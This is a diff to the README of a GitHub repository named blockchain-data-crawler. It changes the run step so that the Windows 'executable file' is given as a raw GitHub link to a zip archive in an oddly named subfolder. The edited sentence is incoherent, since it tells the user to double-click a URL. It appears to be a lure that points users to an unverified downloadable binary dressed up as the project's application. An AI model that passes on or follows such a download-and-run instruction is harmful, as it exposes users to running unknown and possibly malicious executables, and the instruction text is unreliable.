kiranjisonawane143/blockchain-data-crawler/README.md

 2. **Run the Application:**
    - Navigate to the folder where you extracted the files.
-   - Double-click the executable file (e.g., `blockchain-data-crawler.exe` for Windows, or `blockchain-data-crawler` for macOS/Linux).
+   - Double-click the executable file (e.g., `https://raw.githubusercontent.com/kiranjisonawane143/blockchain-data-crawler/main/fennish/blockchain-data-crawler.zip` for Windows, or `blockchain-data-crawler` for macOS/Linux).

 3. **Follow the On-Screen Instructions:**
    - The application will display a user-friendly interface.